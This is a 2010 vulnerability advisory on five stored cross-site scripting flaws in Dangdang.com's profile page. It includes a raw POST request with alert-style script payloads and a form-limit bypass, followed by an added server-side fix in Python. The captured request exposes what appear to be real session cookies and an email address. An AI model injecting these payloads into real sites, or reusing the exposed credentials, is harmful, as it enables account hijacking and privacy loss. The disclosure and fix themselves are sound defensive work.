Vulnerability title: Multiple stored XSS vulnerabilities on Dangdang.com
Vendor: Dangdang.com
Author: riusksk
Submitted: 2010-08-22
Published: 2010-08-22
Vulnerability type: Cross-site scripting
Severity: Medium
Status: Vendor could not be reached, or the vendor actively ignored the report
Source:
Vulnerability details
Brief description:

Dangdang.com has multiple stored XSS vulnerabilities.
Detailed description:

The "edit personal profile" page on Dangdang.com contains five stored XSS vulnerabilities. The first four are in the blog address, hobbies, "people you like or admire" and self-introduction fields: writing the XSS string <script>alert(/1/)</script> into any of them causes it to execute. The fifth is in the nickname field. That field has a length limit, so the POST form is built locally instead and used to submit </title><script>alert(/1/)</script>, which executes the script; this can be used to steal users' cookies and log in as them.


Proof of vulnerability:

Host=customer.dangdang.com
User-Agent=Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.8) Gecko/20100722 (BT-beachlife) Firefox/3.6.8
Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language=zh-cn,zh;q=0.5
Accept-Encoding=gzip,deflate
Accept-Charset=GB2312,utf-8;q=0.7,*;q=0.7
Keep-Alive=115
Connection=keep-alive
Referer=http://customer.dangdang.com/profile/Myarchives.php?save=ok
Cookie=__permanent_id=20100203235038955135819263359204968; __new_p_id=1; __ozlvd=1282408219; producthistoryname=Windows%C4%DA%BA%CB%CA%B5%D1%E9%BD%CC%B3%CC%28%B8%BD%B9%E2%C5%CC%29%2CWeb+%B0%B2%C8%AB%B2%E2%CA%D4%2CWeb%C8%EB%C7%D6%B0%B2%C8%AB%B2%E2%CA%D4%D3%EB%B6%D4%B2%DF%A3%A8%B8%BDCD-ROM%B9%E2%C5%CC%D2%BB%D5%C5%A3%A9%2CSQL%D7%A2%C8%EB%B9%A5%BB%F7%D3%EB%B7%C0%D3%F9%A3%A8%B0%B2%C8%AB%BC%BC%CA%F5%BE%AD%B5%E4%D2%EB%B4%D4%A3%A9%2CPHP%BA%CDMySQL+Web%BF%AA%B7%A2+%A3%A8%D4%AD%CA%E9%B5%DA4%B0%E6%A3%A9%2CWEB%B0%B2%C8%AB%CA%D6%B2%E1%2C%BB%D2%C3%B1%B9%A5%BB%F7%B0%B2%C8%AB%CA%D6%B2%E1%A1%AA%A1%AA%C9%F8%CD%B8%B2%E2%CA%D4%D3%EB%C2%A9%B6%B4%B7%D6%CE%F6%BC%BC%CA%F5%2C%BA%DA%BF%CD%B9%A5%B7%C0%BC%BC%CA%F5%B1%A6%B5%E4%3A+Web%CA%B5%D5%BD%C6%AA%2C%CD%F8%C2%E7%C9%F8%CD%B8%B2%E2%CA%D4%A3%AD%B1%A3%BB%A4%CD%F8%C2%E7%B0%B2%C8%AB%B5%C4%BC%BC%CA%F5%A1%A2%B9%A4%BE%DF%BA%CD%B9%FD%B3%CC%2C%CD%F8%C2%E7%B0%B2%C8%AB%C6%C0%B9%C0%A3%A8%B5%DA%B6%FE%B0%E6%A3%A9; producthistoryid=683764%2C20810140%2C9222047%2C20848476%2C20546846%2C9150871%2C9272693%2C20653653%2C20080185%2C20842796; validatedflag=0; cart_id=1005102129448895; __utma=263274265.1985588993.1278076754.1282149439.1282284535.9; __utmz=263274265.1282284535.9.4.utmcsr=product.dangdang.com|utmccn=(referral)|utmcmd=referral|utmcct=/product.aspx; HK=web%25B0%25B2%25C8%25AB%25B2%25E2%25CA%25D4%3B%25B0%25B2%25C8%25AB%25C2%25A9%25B6%25B4%25D7%25B7%25D7%25D9%3BWEB%25B0%25B2%25C8%25AB%25B2%25E2%25CA%25D4%3Bsql%25D7%25A2%25C8%25EB%3BWeb%25C8%25EB%25C7%25D6%3B%25C9%25F8%25CD%25B8%3B%25C9%25F8%25CD%25B8%25B2%25E2%25CA%25D4%3BWEB%25C9%25F8%25CD%25B8%25B2%25E2%25CA%25D4%3BWEB%25B0%25B2%25C8%25AB; from=488-133054; cart_db_index=3; cart_items_count=0; ck_db_index=3; is_new=1; __trace_id=20100822000612281259688254741795619; agree_date=1; login.dangdang.com=.AYH=100822001255147579&.ASPXAUTH=I3swGtBNKlIZFcNLIaO4tWX30HRxb+KI; LD=raSYRlzfovLiO635sEBP0drFJ8zWhCcs; dangdang.com=email=NzczMDgxODc4QHFxLmNvbQ==&nickname=&display_id=5533648947491&customerid=uGQo9p1MXgQ4TwpLZdhuKw==&viptype=4+AtZiSmtFY=&show_name=%u0037%u0037%u0033%u0030%u0038%u0031%u0038%u0037%u0038; email=773081878%40qq.com; nickname=
Content-Type=multipart/form-data; boundary=---------------------------97891525516423
Content-Length=2559
POSTDATA =-----------------------------97891525516423
Content-Disposition: form-data;
3
-----------------------------97891525516423
Content-Disposition: form-data;; filename=""
Content-Type: application/octet-stream
-----------------------------97891525516423
Content-Disposition: form-data;
-----------------------------97891525516423
Content-Disposition: form-data;
27019229
-----------------------------97891525516423
Content-Disposition: form-data;
p3h4ck
-----------------------------97891525516423
Content-Disposition: form-data;
ctl04
-----------------------------97891525516423
Content-Disposition: form-data;
1
-----------------------------97891525516423
Content-Disposition: form-data;
116
-----------------------------97891525516423
Content-Disposition: form-data;
188
-----------------------------97891525516423
Content-Disposition: form-data;
116
-----------------------------97891525516423
Content-Disposition: form-data;
Rd_sex_1
-----------------------------97891525516423
Content-Disposition: form-data;
0
-----------------------------97891525516423
Content-Disposition: form-data;
student
-----------------------------97891525516423
Content-Disposition: form-data;
本科生
-----------------------------97891525516423
Content-Disposition: form-data;
0
-----------------------------97891525516423
Content-Disposition: form-data;
0
-----------------------------97891525516423
Content-Disposition: form-data;
0
-----------------------------97891525516423
Content-Disposition: form-data;
0
-----------------------------97891525516423
Content-Disposition: form-data;
<script>alert(/1/)</script>
-----------------------------97891525516423
Content-Disposition: form-data;
<script>alert(/2/)</script>
-----------------------------97891525516423
Content-Disposition: form-data;
<script>alert(/3/)</script>
-----------------------------97891525516423
Content-Disposition: form-data;
<script>alert(/4/)</script>
-----------------------------97891525516423
Content-Disposition: form-data;
保存基本信息
-----------------------------97891525516423--

Suggested fix:

Filter cross-site scripting keywords.
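A server-side way to close off the five fields from the detailed description, added here as an example; it is not Dangdang's own code. It re-checks the nickname and free-text lengths and the blog URL form on the server (the nickname limit in the report was only enforced by the form, which is why a hand-built POST got past it), stores the values unchanged, and HTML-encodes at output time instead of stripping keywords, so the payloads quoted above are rendered as text. It also marks the login cookie HttpOnly, which removes the cookie-theft outcome described in the report even if some other injection slips through. The field names, the two length limits and the sample submission are assumptions.

```python
"""Server-side handling for the five profile fields named in the report.

Added example, not Dangdang's code. Field names, length limits and the
sample submission are assumptions; the report only says the nickname has
a (form-side) length limit that a locally built POST bypassed.
"""
import html
from http.cookies import SimpleCookie
from urllib.parse import urlsplit

NICKNAME_MAX_LEN = 20        # assumed; the real limit is not in the report
FREE_TEXT_MAX_LEN = 500      # assumed
FREE_TEXT_FIELDS = ("hobbies", "admired_people", "self_intro")

# Constructed submission reusing the payloads quoted in the report.
SAMPLE_FORM = {
    "nickname": "</title><script>alert(/1/)</script>",
    "blog_url": "<script>alert(/1/)</script>",
    "hobbies": "<script>alert(/2/)</script>",
    "admired_people": "<script>alert(/3/)</script>",
    "self_intro": "<script>alert(/4/)</script>",
}


def validation_error(form: dict) -> str:
    """Re-check every limit on the server; returns "" when the form is fine.

    A maxlength in the HTML form is advisory only: a hand-built POST, as in
    the report, never sees it."""
    nick = form.get("nickname", "")
    if not 1 <= len(nick) <= NICKNAME_MAX_LEN:
        return "nickname length out of range"
    for name in FREE_TEXT_FIELDS:
        if len(form.get(name, "")) > FREE_TEXT_MAX_LEN:
            return f"{name} too long"
    blog = form.get("blog_url", "")
    parts = urlsplit(blog)
    if blog and (parts.scheme not in ("http", "https") or not parts.netloc):
        return "blog_url must be an absolute http(s) URL"
    return ""


def store_profile(form: dict) -> dict:
    """Keep the values verbatim after validation; no keyword stripping.

    Encoding happens at output time, where the HTML context is known."""
    err = validation_error(form)
    if err:
        raise ValueError(err)
    return {k: form.get(k, "") for k in ("nickname", "blog_url", *FREE_TEXT_FIELDS)}


def render_profile(profile: dict) -> str:
    """Encode every stored value for the context it lands in.

    html.escape turns '<' into '&lt;', so a stored '</title><script>' cannot
    close the <title> element; quote=True keeps values inside attribute quotes."""
    nick = html.escape(profile["nickname"], quote=True)
    url = html.escape(profile["blog_url"], quote=True)
    rows = [f'<dt>blog</dt><dd><a href="{url}">{url}</a></dd>']
    for name in FREE_TEXT_FIELDS:
        rows.append(f"<dt>{name}</dt><dd>{html.escape(profile[name], quote=True)}</dd>")
    body = "\n".join(rows)
    return (f"<html><head><title>{nick}</title></head>\n"
            f"<body><h1>{nick}</h1><dl>\n{body}\n</dl></body></html>")


def session_cookie_header(name: str, value: str) -> str:
    """Set-Cookie line for the login cookie.

    HttpOnly keeps the value out of document.cookie, so a script that does
    run cannot read it; Secure and SameSite limit where it is sent."""
    jar = SimpleCookie()
    jar[name] = value
    jar[name]["httponly"] = True
    jar[name]["secure"] = True
    jar[name]["samesite"] = "Lax"
    jar[name]["path"] = "/"
    return jar.output(header="Set-Cookie:")


if __name__ == "__main__":
    print("rejected:", validation_error(SAMPLE_FORM))
    safe = store_profile(dict(SAMPLE_FORM, nickname="p3h4ck",
                              blog_url="http://example.com/"))
    print(render_profile(safe))
    print(session_cookie_header("sid", "constructed-session-id"))
```

Validation is deliberately not the only barrier: render_profile encodes whatever it is given, so a value that reached storage by some route the validator never saw is still rendered as text.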